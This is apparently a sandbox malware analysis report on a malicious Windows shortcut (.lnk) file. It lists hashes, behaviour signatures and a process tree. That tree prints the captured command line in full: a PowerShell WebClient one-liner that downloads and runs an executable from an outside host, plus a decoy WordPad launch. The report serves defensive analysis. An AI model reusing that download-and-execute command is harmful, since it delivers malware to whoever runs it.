Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    30s
  • max time network
    33s
  • platform
    windows7_x64
  • resource
    win7-20221111-en
  • resource tags

    arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system
  • submitted
    02/02/2023, 13:36

General

  • Target

    43843_8439_8329098.lnk

  • Size

    130KB

  • MD5

    2fcb95c29131b2bdb9f864f492a3bcd1

  • SHA1

    7ffa77710ae6a95b3759643852a5a829c550a36e

  • SHA256

    36a4e3cebb2ed11077cca219e6033a31a60fc8924ed48b79e216d4ceefcc08f5

  • SHA512

    a527d90b15ce7556ae167aba16cfbda8d213b87ec8d2e095ba57060ae7af3315de7bfcbbaddca8e7ad4ff8c7f6a40f5f9e3b8bdea25292a24f2d31740368baa7

  • SSDEEP

    3072:EE+n8y1Bzt+mwV4jUs8Nu+GEodNn6/f1DaiSGeQnHkJ6U:EE+nPvxwV28NTGEoEAbGXHM6U

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 3 IoCs
  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 9 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\43843_8439_8329098.lnk
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1652
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /R set U=http:/&powershell "$J=new-object system.net.webclient;$J.downloadfile($env:U+'/myscs.ca/valued_sp3_update.exe',$env:tmp+'\Up.exe');"&"C:\Program Files\windows nt\accessories\wordpad" c:\pagefile.sys&C:\Users\Admin\AppData\Local\Temp/Up&g3Jerl:+hqw^-BdjJd&cjM34{_________
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1748
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell "$J=new-object system.net.webclient;$J.downloadfile($env:U+'/myscs.ca/valued_sp3_update.exe',$env:tmp+'\Up.exe');"
        3⤵
        • Blocklisted process makes network request
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1960
      • C:\Program Files\windows nt\accessories\wordpad.exe
        "C:\Program Files\windows nt\accessories\wordpad" c:\pagefile.sys
        3⤵
        • Suspicious use of SetWindowsHookEx
        PID:1564

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1652-54-0x000007FEFBB11000-0x000007FEFBB13000-memory.dmp

    Filesize

    8KB

  • memory/1960-94-0x000007FEF4130000-0x000007FEF4B53000-memory.dmp

    Filesize

    10.1MB

  • memory/1960-96-0x0000000002714000-0x0000000002717000-memory.dmp

    Filesize

    12KB

  • memory/1960-95-0x000007FEF35D0000-0x000007FEF412D000-memory.dmp

    Filesize

    11.4MB

  • memory/1960-97-0x000000000271B000-0x000000000273A000-memory.dmp

    Filesize

    124KB

  • memory/1960-98-0x0000000002714000-0x0000000002717000-memory.dmp

    Filesize

    12KB

  • memory/1960-99-0x000000000271B000-0x000000000273A000-memory.dmp

    Filesize

    124KB